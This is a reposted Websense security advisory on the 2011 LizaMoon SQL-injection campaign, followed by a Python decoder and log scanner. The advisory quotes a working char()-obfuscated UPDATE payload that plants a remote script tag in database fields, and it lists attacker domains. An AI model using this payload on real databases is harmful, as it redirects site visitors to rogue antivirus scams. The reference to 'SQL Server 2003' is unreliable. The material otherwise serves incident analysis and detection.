Friday, April 01, 2011 9:35 AM
cmosby
Update on LizaMoon mass-injection and Q&A - Websense
The LizaMoon mass-injection campaign is still ongoing and
more than 500,000 URLs have a script link to lizamoon.com according to
Google Search results. We have also been able to identify several other
URLs that are injected in the exact same way, so the attack is even
bigger than we originally thought. All in all, a Google Search reveals over 1,500,000
URLs that have a link with the same URL structure as the initial
attack. Google Search results aren't always great indicators of how
prevalent or widespread an attack is as it counts each unique URL, not
domain or site, but it does give some indication of the scope of the
problem if you look at how the numbers go up or down.

Additional injected URLs
Here's a list of domains that we have identified so far (with help from blog comment posters; thanks for that guys!).
hxxp://lizamoon.com/ur.php
hxxp://tadygus.com/ur.php
hxxp://alexblane.com/ur.php
hxxp://alisa-carter.com/ur.php
hxxp://online-stats201.info/ur.php
hxxp://stats-master111.info/ur.php
hxxp://agasi-story.info/ur.php
hxxp://general-st.info/ur.php
hxxp://extra-service.info/ur.php
hxxp://t6ryt56.info/ur.php
hxxp://sol-stats.info/ur.php
hxxp://google-stats49.info/ur.php
hxxp://google-stats45.info/ur.php
hxxp://google-stats50.info/ur.php
hxxp://stats-master88.info/ur.php
hxxp://eva-marine.info/ur.php
hxxp://stats-master99.info/ur.php
hxxp://worid-of-books.com/ur.php
hxxp://google-server43.info/ur.php
hxxp://tzv-stats.info/ur.php
hxxp://milapop.com/ur.php
The domain stats-master111.info was registered on October 21, 2010,
which could mean the first attack happened then, but we don't have any
evidence of that. The first confirmed case that we know of is from
December 2010, but we didn't make the connection to LizaMoon until
today. The last domain, milapop.com, was registered today.
SQL Injection
We were able to find more information about the SQL Injection itself
(thanks Peter) and the command is par for the course when it comes to
SQL Injections. Here's one example:
+update+Table+set+FieldName=REPLACE(cast(FieldName+as+varchar(8000)),cast(char(60)%2Bchar(47)
%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)
%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)
%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)
%2Bchar(47)%2Bchar(103)%2Bchar(111)%2Bchar(111)%2Bchar(103)%2Bchar(108)%2Bchar(101)%2Bchar(45)
%2Bchar(115)%2Bchar(116)%2Bchar(97)%2Bchar(116)%2Bchar(115)%2Bchar(53)%2Bchar(48)%2Bchar(46)
%2Bchar(105)%2Bchar(110)%2Bchar(102)%2Bchar(111)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)
%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)
%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)
+as+varchar(8)))--
More information is available over on Stackoverflow.com.
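The encoded statement above is hard to read as it stands in a log or a database dump. The following Python decoder is an added example, not code from the Websense post: it URL-decodes a query string, turns the char()-concatenation chains into quoted string literals so the statement reads as plain SQL, pulls out any <script src=...> target for blocklisting or searching, and flags query strings in web-server log lines that carry such payloads. Going beyond the post, it also decodes the 0x hex literals used in the CAST(0x... AS VARCHAR) form of the same technique. The URL-encoded statement is the one quoted above, joined onto one line; the hex-encoded statement and the log lines are constructed samples.

```python
"""Decode char()/hex-obfuscated SQL-injection payloads such as the one quoted
above and flag them in web-server query strings. Added example; the samples
marked "constructed" are not from the post."""
import re
from urllib.parse import unquote_plus

# The URL-encoded UPDATE statement quoted in the post, joined onto one line.
SAMPLE_URL_PAYLOAD = (
    "+update+Table+set+FieldName=REPLACE(cast(FieldName+as+varchar(8000)),cast(char(60)%2Bchar(47)"
    "%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)"
    "%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)"
    "%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)"
    "%2Bchar(47)%2Bchar(103)%2Bchar(111)%2Bchar(111)%2Bchar(103)%2Bchar(108)%2Bchar(101)%2Bchar(45)"
    "%2Bchar(115)%2Bchar(116)%2Bchar(97)%2Bchar(116)%2Bchar(115)%2Bchar(53)%2Bchar(48)%2Bchar(46)"
    "%2Bchar(105)%2Bchar(110)%2Bchar(102)%2Bchar(111)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)"
    "%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)"
    "%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)"
    "+as+varchar(8)))--"
)

# Constructed: the hex-literal variant of the same technique (not from the post).
SAMPLE_HEX_PAYLOAD = (
    "DECLARE @S VARCHAR(4000);SET @S=CAST(0x73656C6563742031 AS VARCHAR(4000));EXEC(@S)--"
)

# Constructed log lines in a simplified "date time method uri-stem uri-query status" layout.
SAMPLE_LOG = [
    "2011-03-29 10:15:02 GET /news.aspx id=42 200",
    "2011-03-29 10:15:07 GET /news.aspx id=42;" + SAMPLE_URL_PAYLOAD + " 200",
    "2011-03-29 10:15:09 GET /news.aspx id=1;" + SAMPLE_HEX_PAYLOAD.replace(" ", "%20") + " 500",
]

# A chain like char(60)+char(47)+...; the \b keeps "varchar(8000)" from matching.
CHAR_RUN = re.compile(r"(?:\bchar\(\d+\)\s*\+\s*)*\bchar\(\d+\)", re.IGNORECASE)
# A 0x literal of whole bytes, as used in CAST(0x... AS VARCHAR) payloads.
HEX_LITERAL = re.compile(r"0x((?:[0-9A-Fa-f]{2})+)")
# Cheap first-pass indicator applied to a URL-decoded query string.
SUSPICIOUS = re.compile(r"\bchar\(\d+\)|0x[0-9A-Fa-f]{8,}|\bexec\s*\(|\bcast\s*\(", re.IGNORECASE)


def _chars_to_text(run):
    """char(60)+char(47) -> '</'"""
    return "".join(chr(int(n)) for n in re.findall(r"\d+", run))


def decode_hex_literal(hexdigits):
    """Bytes of a 0x literal as text; NVARCHAR payloads are UTF-16LE (zero high bytes)."""
    raw = bytes.fromhex(hexdigits)
    if len(raw) >= 2 and len(raw) % 2 == 0 and not any(raw[1::2]):
        return raw.decode("utf-16-le")
    return raw.decode("latin-1")


def _quote(text):
    return "'" + text.replace("'", "''") + "'"


def decode_payload(encoded):
    """URL-decode a query-string payload and replace char() chains and 0x literals
    with quoted string literals so the statement reads as plain SQL."""
    text = unquote_plus(encoded).strip()
    text = CHAR_RUN.sub(lambda m: _quote(_chars_to_text(m.group())), text)
    return HEX_LITERAL.sub(lambda m: _quote(decode_hex_literal(m.group(1))), text)


def extract_strings(encoded):
    """The decoded string arguments, char() chains first, then 0x literals."""
    text = unquote_plus(encoded)
    out = [_chars_to_text(m.group()) for m in CHAR_RUN.finditer(text)]
    out += [decode_hex_literal(h) for h in HEX_LITERAL.findall(text)]
    return out


def script_srcs(encoded):
    """<script src=...> targets inside the decoded strings (for blocklists and log searches)."""
    srcs = []
    for s in extract_strings(encoded):
        srcs += re.findall(r"<script[^>]*\bsrc=[\"']?([^\s\"'>]+)", s, re.IGNORECASE)
    return srcs


def scan_log_lines(lines):
    """Return (line_no, decoded_query, script_urls) for requests carrying encoded SQL."""
    hits = []
    for n, line in enumerate(lines, 1):
        fields = line.split()
        if len(fields) < 6:
            continue
        query = fields[4]
        if SUSPICIOUS.search(unquote_plus(query)):
            hits.append((n, decode_payload(query), script_srcs(query)))
    return hits


if __name__ == "__main__":
    print(decode_payload(SAMPLE_URL_PAYLOAD))
    for n, decoded, urls in scan_log_lines(SAMPLE_LOG):
        print(f"line {n}: {urls or 'no script src'}\n  {decoded}")
```

Running it shows the two string arguments of the REPLACE call: the first is the full `</title><script src=http://google-stats50.info/ur.php></script>` tag and the second is a single space. The same decoder run over a database export finds the tag wherever it landed in text columns, and the extracted src host is what to search for in proxy logs and to block at the gateway.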
Injected code
Here is the content of an example ur.php file. The content isn't even
obfuscated, which is somewhat unusual. All the code does is redirect
to a rogue AV site. We've seen the scripts change over time to redirect
to several different rogue AV sites:

What happens to the user?
We wrote in an earlier post
that the payload site doesn't work properly, but further testing shows
that it does and we created a video showing what happens if a user
visits a website that contains the injected code. The video is available
at the end of this post. The user only gets the malicious code once per
IP address, so if you've already visited the site you won't get the
code again. This is something we see often in attacks, especially in
exploit kits.
The Rogue AV software that is installed is called Windows Stability Center and the file that is downloaded is currently detected by 13/43 anti-virus engines according to VirusTotal.

The software then displays a warning that there are lots of problems
on your PC. To fix them you have to pay for the full version of the
application. Very traditional rogue AV scam. Dancho Danchev has some
more information on his blog.

Where are users coming from?
We looked at reports of traffic to lizamoon.com as indicated by data
collected by the Websense Threatseeker Network and here's a graph of
where those users are located.

So what about iTunes?
We received blog comments from our readers (keep them coming, we read
them all!) and some were critical of our use of iTunes in the title of
the previous post and how we stated that iTunes URLs had been
compromised, but the script neutered by Apple. All of what we stated was
technically correct, but perhaps we didn't make it clear enough.
Every time there's a mass-injection like this, and there really
hasn't been anything this big before, we try to identify larger systems
and sites that have been affected to give some indication of how wide
the attack has spread. And there are few systems out there bigger than
iTunes, so when we saw that content on itunes.apple.com contained the
injected link we wanted to make people aware of that, even if the script
didn't work. It seems that some readers weren't too happy about that
and argued that we could also say that Google Search was compromised
because it also shows the injected code in search results. We don't
really agree with that, but perhaps we shouldn't have highlighted it the
way we did.
Questions & Answers about the LizaMoon mass-injection
Q: Why is this called LizaMoon?
A: The first domain we saw on March 29, 2011 was called lizamoon.com.
Q: How many sites have been affected by this?
A: It's really hard to say. Google Search indicates it's over 1.5 million URLs,
but that number could be over-inflated. It's safe to say it's in the
hundreds of thousands.
Q: How does the script get added to the compromised sites?
A: We're still looking into that. We know that it uses SQL Injection to do
it, and not XSS as some of our blog readers have suggested.
Q: How do you know it's using SQL Injection?
A: We have been contacted by people who have seen the code in their Microsoft SQL
databases. So far we have only had reports of Microsoft SQL Server 2003
and 2005 being affected, so if you have any information that says that
2008 has been hit as well, we'd like to know about it.
Q: Could this mean that there's a vulnerability in Microsoft SQL Server 2003 and 2005?
A: We don't know, but we don't think so. Most likely there are
vulnerabilities in the Web systems used by these sites, such as outdated
CMS and blog systems.
Q: What happens when I visit a site that contains the injected script?
A: Your PC will get redirected to a rogue AV site, displaying fake information about your PC being infected.
Q: Will I get redirected over and over again if I visit a compromised site?
A: No, the script only redirects you once.
Q: When will the LizaMoon attack be over?
A: Not anytime soon. We're still seeing references to Gumblar, which was a mass-injection attack found in 2009.
Filed under: Internet Hacks, Spam\Phishing, Cybercrime, Malware